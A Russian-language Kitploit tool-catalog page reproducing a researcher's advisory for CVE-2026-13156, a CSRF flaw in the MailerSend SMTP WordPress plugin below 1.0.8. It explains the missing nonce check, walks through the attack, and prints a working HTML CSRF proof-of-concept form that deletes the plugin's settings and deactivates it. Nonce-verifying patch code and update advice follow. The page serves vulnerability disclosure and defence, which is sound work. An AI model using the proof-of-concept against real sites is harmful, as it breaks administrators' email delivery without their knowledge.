Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-13156 — Уведомление об уязвимости CVE-2026-13156 и PoC — Обнаружено Хуинь Кьен Минем (MinhHK). | Kitploit
Инструменты/GitHubGitHub/minhhk68/cve-2026-13156
Инструменты фишингаАнализ уязвимостейЭксплуатацияВеб-безопасностьСтатьи и ИсследованияОбучение и Образование
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

Уведомление об уязвимости CVE-2026-13156 и PoC — Обнаружено Хуинь Кьен Минем (MinhHK).

Репозиторий
51 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-13156 — MailerSend Official SMTP Integration < 1.0.8 Удаление настроек и деактивация плагина через CSRF

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory CVE-2026-13156 CSRF Attack Chain Infographic


📌 Аннотация и быстрые ссылки

[!IMPORTANT] Аннотация: Высококритичная уязвимость межсайтовой подделки запросов (CSRF) (CVE-2026-13156) была обнаружена в официальном MailerSend SMTP Integration плагине для WordPress (< 1.0.8). Обработчик удаления конфигурации mailersend_handle_configuration_delete() проверяет административные возможности (manage_options), но полностью пропускает проверку WordPress Nonce (check_admin_referer()). Злоумышленник может создать вредоносный межсайтовый запрос, нацеленный на аутентифицированного администратора WordPress, чтобы незаметно удалить сохранённые SMTP-учётные данные и принудительно деактивировать плагин, что приведёт к полному отказу в обслуживании приложения во всех почтовых рабочих процессах.

👉 Читайте полное техническое исследование на Medium: Deep-Dive Technical Write-up: CVE-2026-13156 или ознакомьтесь с моим портфолио по безопасности: https://minhhk.web.app/


📋 Краткое описание и обзор уязвимости

  • Идентификатор уязвимости: CVE-2026-13156 (Идентификатор консультации WPScan: 595e653d-0904-43cf-8e61-d684599de11b)
  • Затронутое программное обеспечение: MailerSend – Official SMTP Integration (Плагин WordPress)
  • Затронутые версии: До версии 1.0.8 (< 1.0.8)
  • Тип уязвимости: Межсайтовая подделка запросов (CSRF, приводящая к удалению настроек и деактивации плагина) — CWE-352
  • Ведущий исследователь и автор отчёта: Huynh Kien Minh (псевдоним: MinhHK)
  • Роль и принадлежность: Студент по информационной безопасности, охотник за ошибками (bug bounty hunter) и исследователь наступательной безопасности.

Об исследователе:
Huynh Kien Minh (Huỳnh Kiến Minh) — проактивный исследователь кибербезопасности и аналитик уязвимостей, известный глубокими оценками безопасности и ответственными раскрытиями, включая технические разборы CVE-2026-13156. Он также был официально признан и отмечен в Proton Security Hall of Fame за обнаружение и раскрытие критических уязвимостей безопасности.


🌐 Официальный центр проверки и ссылки

Чтобы проверить данную техническую консультацию, изучить анализ proof-of-concept или связаться с исследователем, посетите:

  • 🏠 Официальный портфолио-хаб: Huynh Kien Minh Security Portfolio Hub
  • 💼 Профиль LinkedIn: Свяжитесь с Huynh Kien Minh в LinkedIn
  • 📝 Официальный технический документ на Medium: Deep-Dive Technical Write-up: CVE-2026-13156 на Medium
  • 👨‍💻 Профиль GitHub: Профиль MinhHK68 на GitHub
  • 🔗 Консультация WPScan: Запись WPScan для CVE-2026-13156
  • 🔗 Отчёт BaseFortify: Анализ BaseFortify CVE-2026-13156

🔍 Глубокий технический разбор и анализ первопричины

1. Анализ первопричины (отсутствие проверки nonce)

Плагин MailerSend Official SMTP Integration для WordPress (до версии 1.0.8) регистрирует административное действие (configuration-delete), предназначенное для удаления сохранённых API-токенов, очистки параметров SMTP-конфигурации (wp_options) и деактивации плагина при запуске из административной панели.

Хотя конечная точка проверяет, имеет ли активный пользователь возможность manage_options (гарантируя, что запрос исходит из сеанса администратора), она не выполняет проверку WordPress nonce (check_admin_referer() или wp_verify_nonce()).

Поскольку HTTP-запросы без проверки nonce не могут отличить намеренные клики администратора от поддельных межсайтовых запросов, любой внешний сайт, загруженный аутентифицированным администратором, может незаметно запустить действие configuration-delete.

2. Жизненный цикл атаки и воздействие

  1. Определение цели: Злоумышленник определяет целевой сайт WordPress, использующий MailerSend SMTP (< 1.0.8).
  2. Доставка полезной нагрузки: Злоумышленник создаёт вредоносную HTML/JavaScript веб-страницу, содержащую автоматически отправляемую форму, нацеленную на административную конечную точку (/wp-admin/admin-post.php или /wp-admin/admin.php?page=mailersend&action=configuration-delete).
  3. Запуск: Вошедший в систему администратор WordPress посещает веб-страницу злоумышленника (например, через фишинг, ссылку на форуме или XSS на внешнем сайте).
  4. Выполнение и отказ в обслуживании: Браузер отправляет поддельный запрос вместе с активными сессионными cookie администратора. Плагин MailerSend выполняет обработчик удаления:
    • Все сохранённые настройки MailerSend SMTP и учётные данные API удаляются из базы данных.
    • Плагин MailerSend автоматически деактивируется.
    • Критическое воздействие: Целевой веб-сайт немедленно теряет все возможности отправки электронной почты (сброс паролей, уведомления о заказах, оповещения безопасности выходят из строя без предупреждения).

💻 Код эксплойта Proof-of-Concept (PoC)

[!WARNING] Этическое предупреждение: Следующая HTML-полезная нагрузка межсайтовой подделки запросов (CSRF) proof-of-concept предоставлена строго в образовательных целях, для защитной проверки и аудита безопасности в рамках этических протоколов раскрытия Huynh Kien Minh. Не запускайте её против несанкционированных целей.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ Устранение уязвимости и анализ патча

Для системных администраторов и владельцев сайтов

  • Немедленное обновление: Обновите плагин MailerSend – Official SMTP Integration немедленно до версии 1.0.8 или выше.
  • Гигиена сеансов: Всегда выходите из административных учётных записей WordPress при просмотре внешних ненадёжных веб-страниц или используйте отдельные изолированные профили браузера (или контейнеры) для администрирования сайта.

Для разработчиков (как работает патч)

Чтобы должным образом защитить административные действия, изменяющие состояние, в плагинах WordPress, разработчики должны применять строгую проверку nonce перед обработкой запросов:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 Связанное признание в области безопасности

  • 🏆 Признание Proton Hall of Fame: Отмечен за обнаружение и сообщение о критических уязвимостях в инфраструктуре Proton.
  • 🏠 Официальный портфолио-хаб: Изучите больше исследований в области наступательной безопасности, инструментов безопасности с открытым исходным кодом и публикаций Huynh Kien Minh.

⚖️ Лицензия и авторские права

Этот репозиторий и техническая консультация поддерживаются и публикуются Huynh Kien Minh (MinhHK) в соответствии с руководящими принципами ответственного раскрытия для создания более безопасной глобальной экосистемы WordPress и кибербезопасности.

Скачать инструмент